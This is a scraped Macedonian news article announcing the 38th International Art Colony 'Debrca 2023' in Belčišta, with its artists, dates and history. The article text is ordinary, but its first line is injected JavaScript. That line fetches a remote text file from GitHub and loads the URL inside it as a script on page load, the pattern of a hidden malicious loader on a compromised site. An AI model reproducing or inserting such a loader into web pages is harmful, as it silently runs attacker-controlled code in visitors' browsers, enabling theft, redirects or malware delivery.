;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); 38-ма Меѓународна ликовна колонија „Дебрца 2023“ - Антропол
АктуелноЛокалноНастани

38-ма Меѓународна ликовна колонија „Дебрца 2023“

Во сабота, на 5 август, во селото Белчишта, општина Дебрца, во 19.30 часот, свечено ќе биде отворена 38-та Интернационална уметничка колонија „Дебрца 2023 “. Годинава, најстарата ликовна колонија во Македонија, е посветена на нејзиниот основоположник, неодамна починатиот педагог и ликовен уметник, Ѓорѓија Целески.

Десет познати уметници ќе бидат дел од годинешната 38-ма по ред Меѓународна ликовна колонија „Дебрца 2023“, најстарата манифестација од тој вој во земјата.

Уметниците Јордан Манасиески од Охрид, Ставре Димитров Стадим, Запро Запров, Војдан Запров и Натали Николоска од Скопје, Андреј Антевски од Куманово, како и Леетив Намдаг Жанчивин – мистер Ли од Монголија, Петар Бељашки и Велислава Пожгорска од Бугарија и Светлана Солодова – Русија во периодот од 5 до 13 август ќе творат во чест на основоположникот на Колонијата, неодамна починатиот педагог и ликовен уметник, Ѓорѓија Целески.

Манифестациајта ќе биде отворена задутре во уметничката галерија во село Белчишта, што беше отворена во 1985, а обновена во 2005 година.

Интернационалната уметничка колонија „Дебрца“ што завршува на 13 овој месец, има најбогат фонд уметнички дела во земјава и располага со над 700 ликовни дела од врвни уметници од Македонија и светот што претставува, непроценливо македонско и светско културно наследство.